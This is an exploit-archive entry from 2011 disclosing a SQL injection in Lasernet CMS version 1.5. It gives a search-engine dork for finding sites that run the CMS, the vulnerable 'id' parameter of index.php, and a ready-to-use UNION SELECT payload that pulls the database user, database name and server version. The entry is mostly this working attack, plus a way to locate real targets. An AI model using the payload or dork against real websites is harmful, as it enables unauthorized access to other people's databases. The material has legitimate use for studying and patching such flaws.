[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Lasernet CMS Version 1.5 SQL Injection Vulnerability
# Published : 2011-08-09
# Author :
# Previous Title : ExtCalendar2 (Auth Bypass/Cookie) SQL Injection
# Next Title : Mambo CMS 4.6.x (4.6.5) SQL Injection Vulnerability
Title : LASERnet CMS Vulnerable to SQL Injection
Vendor : http://lasernet.gr/cms.php
Dork : intext:"Powered by Lasernet"
Category: WebApps
http://localhost.com/index.php?id=[SQL]
Demo:
http://localhost.com/index.php
?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+